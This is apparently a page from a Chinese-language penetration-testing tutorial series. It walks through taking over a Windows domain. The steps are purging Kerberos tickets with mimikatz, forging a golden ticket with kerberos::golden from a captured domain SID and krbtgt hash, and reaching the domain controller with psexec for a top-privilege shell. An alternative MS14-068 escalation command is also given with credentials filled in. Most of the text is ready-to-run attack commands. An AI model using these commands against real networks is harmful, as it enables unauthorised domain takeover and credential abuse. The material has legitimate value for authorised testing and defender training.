主页 > 网络知识 > 渗透贯穿始终中篇(7)

渗透贯穿始终中篇(7)

20201123145507987.png

20201123145724343.png

第二步:.清除自己Client端(域内其他机器)的票据

在mimikatz.exe执行kerberos::list查看我们当前的票据

20201123160238870.png

kerberos::purge 清空当前用户登录的票据

20201123160440812.png

第三步:伪造TGT票据(黄金票据)

20201123161219447.png

kerberos::golden的意思是使用票据功能,/admin 后面的用户是我们可以伪造的任意用户,我这里用calmness,/sid后面输入的就是我们之前抓到的sid,/krbtgt后面是之前抓到的hash, /ptt是立即执行到内存的意思。ps:一共有5个空格,这里需要注意下。
构造好了语句后,在Client端上执行,提示Successfully表示已经成功了。

kerberos::golden /admin:calmness /domain:test.com /sid:S-1-5-21-35384602030-1486526769-2284368966-502  /krbtgt:0e3982c434ed02ff33fb2f0698e3b30e /ptt

20201123162014877.png

使用cmd下 klist命令查看,说明已经成功在Client端伪造了黄金票据

20201123162221643.png

第五步:在Client端通过psexec.exe工具进行连接主控域;连接成功了以后,是直接返回一个cmd的交互式界面,并且是最高权限


另一种方法:MS14-068提权

通过dir访问域控共享文件夹,拒绝访问

20201123150334374.png

获取用户sid:whoami /user

20201123151325253.png

展示参数

20201123153526240.png

执行下列命令,会在当前目录生成一个ccache文件

MS14-068.exe -u administrator@test.com -p root@123456 -s S-1-5-21-3083997108-67568443-464007278-500 -d DC.test.com

20201123154133381.png

删除当前域机器的票证:klist purge

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!